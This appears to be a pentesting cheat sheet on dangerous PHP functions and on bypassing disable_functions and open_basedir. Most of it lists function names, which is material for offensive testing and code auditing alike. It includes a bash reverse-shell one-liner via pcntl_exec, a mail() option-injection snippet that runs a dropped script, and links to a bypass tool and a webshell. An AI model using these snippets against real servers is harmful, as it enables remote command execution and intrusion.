# PHP - Useful Functions & disable\_functiosns/open\_basedir bypass ## PHP Command & Code Execution ### PHP Command Execution **exec** - Returns last line of commands output ```bash echo exec("uname -a"); ``` **passthru** - Passes commands output directly to the browser ```bash echo passthru("uname -a"); ``` **system** - Passes commands output directly to the browser and returns last line ```bash echo system("uname -a"); ``` **shell\_exec** - Returns commands output ```bash echo shell_exec("uname -a"); ``` \`\` \(backticks\) - Same as shell\_exec\(\) ```bash echo `uname -a` ``` **popen** - Opens read or write pipe to process of a command ```bash echo fread(popen("/bin/ls /", "r"), 4096); ``` **proc\_open** - Similar to popen\(\) but greater degree of control ```bash proc_close(proc_open("uname -a",array(),$something)); ``` **pcntl\_exec** - Executes a program \(by default in modern and not so modern PHP you need to load the `pcntl.so` module to use that function\) ```bash pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]); ``` **mail** - ****This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output: ```bash file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt'); ``` **mail** and **putenv** - Chankro tool ### PHP Code Execution Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities. **eval\(\)** assert\(\) - identical to eval\(\) **preg\_replace\('/.\*/e',...\)** - /e does an eval\(\) on the match **create\_function\(\)** - Create a function and use eval\(\) **include\(\)** **include\_once\(\)** **require\(\)** **require\_once\(\)** **$\_GET\['func\_name'\]\($\_GET\['argument'\]\);** **$func = new ReflectionFunction\($\_GET\['func\_name'\]\); $func->invoke\(\);** or **$func->invokeArgs\(array\(\)\); serialize/unserialize** ## disable\_functions & open\_basedir **Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access. Both configuration can be seen in the output of **`phpinfo()`**: ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png) ![](../../../.gitbook/assets/image%20%28380%29.png) ### Bypassing A way to **bypass the common disabled functions** is using [https://github.com/TarlogicSecurity/Chankro](https://github.com/TarlogicSecurity/Chankro) that bypass them using the php functionns _**mail\(\)**_ and _**putenv\(\)**._ ### Use PHP capabilities Note that using **PHP** you can **read and write files, create directories and change permissions**. You can even **dump databases**. Maybe using **PHP** to **enumerate** the box you can find a way to escalate privileges/execute commands. I have created a webshell that makes very easy to perform this actions: [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited) ## ## Other Interesting PHP functions ### List of functions which accept callbacks These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo\(\) could be used. Function => Position of callback arguments 'ob\_start' => 0, 'array\_diff\_uassoc' => -1, 'array\_diff\_ukey' => -1, 'array\_filter' => 1, 'array\_intersect\_uassoc' => -1, 'array\_intersect\_ukey' => -1, 'array\_map' => 0, 'array\_reduce' => 1, 'array\_udiff\_assoc' => -1, 'array\_udiff\_uassoc' => array\(-1, -2\), 'array\_udiff' => -1, 'array\_uintersect\_assoc' => -1, 'array\_uintersect\_uassoc' => array\(-1, -2\), 'array\_uintersect' => -1, 'array\_walk\_recursive' => 1, 'array\_walk' => 1, 'assert\_options' => 1, 'uasort' => 1, 'uksort' => 1, 'usort' => 1, 'preg\_replace\_callback' => 1, 'spl\_autoload\_register' => 0, 'iterator\_apply' => 1, 'call\_user\_func' => 0, 'call\_user\_func\_array' => 0, 'register\_shutdown\_function' => 0, 'register\_tick\_function' => 0, 'set\_error\_handler' => 0, 'set\_exception\_handler' => 0, 'session\_set\_save\_handler' => array\(0, 1, 2, 3, 4, 5\), 'sqlite\_create\_aggregate' => array\(2, 3\), 'sqlite\_create\_function' => 2, ### Information Disclosure Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo\(\) it is definitely a vulnerability. **phpinfo** **posix\_mkfifo** **posix\_getlogin** **posix\_ttyname** **getenv** **get\_current\_user** **proc\_get\_status** **get\_cfg\_var** **disk\_free\_space** **disk\_total\_space** **diskfreespace** **getcwd** **getlastmo** **getmygid** **getmyinode** **getmypid** **getmyuid** ### Other **extract** - Opens the door for register\_globals attacks \(see study in scarlet\). **parse\_str** - works like extract if only one argument is given. putenv **ini\_set** **mail** - has CRLF injection in the 3rd parameter, opens the door for spam. **header** - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header\("location: ..."\); and they do not die\(\);. The script keeps executing after a call to header\(\), and will still print output normally. This is nasty if you are trying to protect an administrative area. **proc\_nice** **proc\_terminate** **proc\_close** **pfsockopen** **fsockopen** **apache\_child\_terminate** **posix\_kill** **posix\_mkfifo** **posix\_setpgid** **posix\_setsid** **posix\_setuid** ### Filesystem Functions According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy\($\_GET\['s'\], $\_GET\['d'\]\); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server. **Open filesystem handler** **fopen** **tmpfile** **bzopen** **gzopen** **SplFileObject**->\_\_construct **Write to filesystem \(partially in combination with reading\)** **chgrp** **chmod** **chown** **copy** **file\_put\_contents** **lchgrp** **lchown** **link** **mkdir** **move\_uploaded\_file** **rename** **rmdir** **symlink** **tempnam** **touch** **unlink** **imagepng** - 2nd parameter is a path. **imagewbmp** - 2nd parameter is a path. **image2wbmp** - 2nd parameter is a path. **imagejpeg** - 2nd parameter is a path. **imagexbm** - 2nd parameter is a path. **imagegif** - 2nd parameter is a path. **imagegd** - 2nd parameter is a path. **imagegd2** - 2nd parameter is a path. **iptcembed** **ftp\_get** **ftp\_nb\_get** **scandir** **Read from filesystem** **file\_exists** **-- file\_get\_contents** **file** **fileatime** **filectime** **filegroup** **fileinode** **filemtime** **fileowner** **fileperms** **filesize** **filetype** **glob** **is\_dir** **is\_executable** **is\_file** **is\_link** **is\_readable** **is\_uploaded\_file** **is\_writable** **is\_writeable** **linkinfo** **lstat** **parse\_ini\_file** **pathinfo** **readfile** **readlink** **realpath** **stat** **gzfile** **readgzfile** **getimagesize** **imagecreatefromgif** **imagecreatefromjpeg** **imagecreatefrompng** **imagecreatefromwbmp** **imagecreatefromxbm** **imagecreatefromxpm** **ftp\_put** **ftp\_nb\_put** **exif\_read\_data** **read\_exif\_data** **exif\_thumbnail** **exif\_imagetype** **hash\_file** **hash\_hmac\_file** **hash\_update\_file** **md5\_file** **sha1\_file** **-- highlight\_file** **-- show\_source** **php\_strip\_whitespace** **get\_meta\_tags**